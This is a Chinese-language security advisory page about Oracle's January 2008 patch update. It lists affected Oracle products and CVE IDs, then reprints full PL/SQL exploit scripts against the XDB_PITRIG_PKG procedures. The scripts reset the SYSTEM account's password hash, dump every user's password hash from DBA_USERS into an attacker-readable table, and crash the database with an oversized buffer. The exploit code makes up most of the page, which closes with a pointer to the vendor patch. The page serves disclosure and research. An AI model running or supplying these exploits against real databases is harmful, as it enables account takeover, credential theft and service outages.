安全研究
安全漏洞
Oracle 2008年1月更新修复多个安全漏洞
发布日期:2008-01-10
更新日期:2008-01-29
受影响系统:
Oracle Application Server 9.0.4.3描述:
Oracle Application Server 10.1.3.3.0
Oracle Application Server 10.1.3.1.0
Oracle Application Server 10.1.3.0.0
Oracle Application Server 10.1.2.2.0
Oracle Application Server 10.1.2.1.0
Oracle Application Server 10.1.2.0.2
Oracle E-Business Suite 12.0.0 - 12.0.3
Oracle E-Business Suite 11.5.9 - 11.5.10 CU2
Oracle PeopleSoft Enterprise Tools 8.49
Oracle PeopleSoft Enterprise Tools 8.48
Oracle PeopleSoft Enterprise Tools 8.22
Oracle Collaboration Suite 10.1.2
Oracle Database 9.2.0.8DV
Oracle Database 9.2.0.8
Oracle Database 11.1.0.6
Oracle Database 10.2.0.3
Oracle Database 10.2.0.2
Oracle Database 10.1.0.5
BUGTRAQ ID: 27229
CVE ID: CVE-2008-0339,CVE-2008-0340,CVE-2008-0341,CVE-2008-0342,CVE-2008-0343,CVE-2008-0344,CVE-2008-0345,CVE-2008-0346,CVE-2008-0347,CVE-2008-0348,CVE-2008-0349,CVE-2008-7233,CVE-2008-7234,CVE-2008-7235,CVE-2008-7236,CVE-2008-7237,CVE-2008-7238,CVE-2008-7239
Oracle Database是一款商业性质大型数据库系统。
Oracle发布了2008年1月的紧急补丁更新公告,修复了多个Oracle产品中的多个漏洞。这些漏洞影响Oracle产品的所有安全属性,可导致本地和远程的威胁。其中一些漏洞可能需要各种级别的授权,但也有些不需要任何授权。最严重的漏洞可能导致完全入侵数据库系统。目前已知的漏洞包括:
xDb.XDB_PITRIG_PKG.PITRIG_DROP、xDb.XDB_PITRIG_PKG.PITRIG_TRUNCATE存储过程中存在SQL注入漏洞,允许远程攻击者通过提交恶意查询请求更改口令,或获取口令哈希。
xDb.XDB_PITRIG_PKG.PITRIG_TRUNCATE、xDb.XDB_PITRIG_PKG.PITRIG_DROP存储过程中还存在缓冲区溢出漏洞,允许远程攻击者通过提交恶意查询请求导致数据库崩溃或执行任意指令。
<*来源:Esteban Martinez Fayo
Pete Finnigan (pete@peterfinnigan.demon.co.uk)
Joxean Koret (joxeankoret@yahoo.es)
Alexander Kornbrust (ak@red-database-security.com)
Ali Kumcu
David Litchfield
Mariano Nunez Di Croce
Alexandr Polyakov
链接:http://www.integrigy.com/security-resources/analysis/Integrigy-Oracle-CPU-January-2008-Analysis.pdf
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2008.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/******* Oracle 10g R1 xDb.XDB_PITRIG_PKG.PITRIG_DROP **********/
/******* SQL Injection Exploit **********/
/******************************************************************/
/************ exploit change system password **************/
/******************************************************************/
/****************** BY Sh2kerr (Digital Security) ***************/
/******************************************************************/
/***************** tested on oracle 10.1.0.2.0 *******************/
/******************************************************************/
/******************************************************************/
/* Date of Public EXPLOIT: January 25, 2008 */
/* Written by: Alexandr "Sh2kerr" Polyakov */
/* email: Alexandr.Polyakov@dsec.ru */
/* site: http://www.dsec.ru */
/******************************************************************/
/* Original Advisory by: */
/* Alexandr Polyakov [ Alexandr.Polyakov@dsec.ru] */
/* Reported: 18 Dec 2007 */
/* Date of Public Advisory: January 15, 2008 */
/* Advisory: http://www.oracle.com/technology/deploy/ */
/* security/critical-patch-updates/cpujan2008.html */
/* */
/******************************************************************/
/* set password 12345 to user SYSTEM */
CREATE OR REPLACE FUNCTION CHANGEPASS return varchar2
authid current_user as
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'update sys.user$ set password=''EC7637CC2C2BOADC'' where name=''SYSTEM''';
COMMIT;
RETURN '';
END;
/
EXEC XDB.XDB_PITRIG_PKG.PITRIG_DROP('SCOTT"."SH2KERR" WHERE 1=SCOTT.CHANGEPASS()--','HELLO IDS IT IS EXPLOIT :)');
/******************************************************************/
/******* Oracle 10g R1 xDb.XDB_PITRIG_PKG.PITRIG_TRUNCATE *********/
/******* SQL Injection Exploit *********/
/******************************************************************/
/************ sploit get password Hashes ***************/
/******************************************************************/
/****************** BY Sh2kerr (Digital Security) ***************/
/******************************************************************/
/***************** tested on oracle 10.1.0.2.0 *******************/
/******************************************************************/
/******************************************************************/
/* Date of Public EXPLOIT: January 28, 2008 */
/* Written by: Alexandr "Sh2kerr" Polyakov */
/* email: Alexandr.Polyakov@dsec.ru */
/* site: http://www.dsec.ru */
/******************************************************************/
/* Original Advisory by: */
/* Alexandr Polyakov [ Alexandr.Polyakov@dsec.ru] */
/* Reported: 18 Dec 2007 */
/* Date of Public Advisory: January 15, 2008 */
/* Advisory: http://www.oracle.com/technology/deploy/ */
/* security/critical-patch-updates/cpujan2008.html */
/* */
/******************************************************************/
CREATE TABLE SH2KERR(id NUMBER,name VARCHAR(20),password VARCHAR(16));
CREATE OR REPLACE FUNCTION SHOWPASS return varchar2
authid current_user as
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'INSERT INTO SCOTT.sh2kerr(id,name,password) SELECT user_id,username,password FROM DBA_USERS';
COMMIT;
RETURN '';
END;
/
EXEC XDB.XDB_PITRIG_PKG.PITRIG_TRUNCATE('SCOTT"."SH2KERR" WHERE 1=SCOTT.SHOWPASS()--','HELLO IDS IT IS EXPLOIT :)');
select * from sh2kerr;
/******************************************************************/
/******* Oracle 10g R1 xDb.XDB_PITRIG_PKG.PITRIG_DROP **********/
/******* SQL Injection Exploit **********/
/******************************************************************/
/************ sploit get password Hashes ***************/
/******************************************************************/
/****************** BY Sh2kerr (Digital Security) ***************/
/******************************************************************/
/***************** tested on oracle 10.1.0.2.0 *******************/
/******************************************************************/
/******************************************************************/
/* Date of Public EXPLOIT: January 28, 2008 */
/* Written by: Alexandr "Sh2kerr" Polyakov */
/* email: Alexandr.Polyakov@dsec.ru */
/* site: http://www.dsec.ru */
/******************************************************************/
/* Original Advisory by: */
/* Alexandr Polyakov [ Alexandr.Polyakov@dsec.ru] */
/* Reported: 18 Dec 2007 */
/* Date of Public Advisory: January 15, 2008 */
/* Advisory: http://www.oracle.com/technology/deploy/ */
/* security/critical-patch-updates/cpujan2008.html */
/* */
/******************************************************************/
CREATE TABLE SH2KERR(id NUMBER,name VARCHAR(20),password VARCHAR(16));
CREATE OR REPLACE FUNCTION SHOWPASS return varchar2
authid current_user as
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'INSERT INTO SCOTT.sh2kerr(id,name,password) SELECT user_id,username,password FROM DBA_USERS';
COMMIT;
RETURN '';
END;
/
EXEC XDB.XDB_PITRIG_PKG.PITRIG_DROP('SCOTT"."SH2KERR" WHERE 1=SCOTT.SHOWPASS()--','HELLO IDS IT IS EXPLOIT :)');
select * from sh2kerr;
/******************************************************************/
/******* Oracle 10g R1 xDb.XDB_PITRIG_PKG.PITRIG_TRUNCATE *********/
/******* BUFFER OVERFLOW *********/
/******************************************************************/
/************ POC exploit , Crash database **************/
/******************************************************************/
/****************** BY Sh2kerr (Digital Security) ***************/
/******************************************************************/
/***************** tested on oracle 10.1.0.2.0 *******************/
/******************************************************************/
/******************************************************************/
/* Date of Public EXPLOIT: January 28, 2008 */
/* Written by: Alexandr "Sh2kerr" Polyakov */
/* email: Alexandr.Polyakov@dsec.ru */
/* site: http://www.dsec.ru */
/******************************************************************/
/* Original Advisory by: */
/* Alexandr Polyakov [ Alexandr.Polyakov@dsec.ru] */
/* Reported: 18 Dec 2007 */
/* Date of Public Advisory: January 15, 2008 */
/* Advisory: http://www.oracle.com/technology/deploy/ */
/* security/critical-patch-updates/cpujan2008.html */
/* */
/******************************************************************/
/* thanks to oraclefun for his pitrig_dropmetadata exploit */
/* */
/******************************************************************/
set serveroutput on
declare
buff varchar2(32767);
begin
/* generate evil buffer */
buff:='12345678901234567890123456789';
buff:=buff||buff;
buff:=buff||buff;
buff:=buff||buff;
buff:=buff||buff;
buff:=buff||buff;
buff:=buff||'0012345678901234567890123sh2kerr';
/* lets see the buffer size */
dbms_output.put_line('SEND EVIL BUFFER SIZE:'||Length(buff));
xDb.XDB_PITRIG_PKG.PITRIG_TRUNCATE(buff,buff);
end;
/
/* P.S. xDb.XDB_PITRIG_PKG.PITRIG_DROP is also vulnerable */
建议:
厂商补丁:
Oracle
------
Oracle已经为此发布了一个安全公告(cpujan2008)以及相应补丁:
cpujan2008:Oracle Critical Patch Update Advisory - January 2008
链接:http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2008.html?_template=/o
浏览次数:3393
严重程度:0(网友投票)
绿盟科技给您安全的保障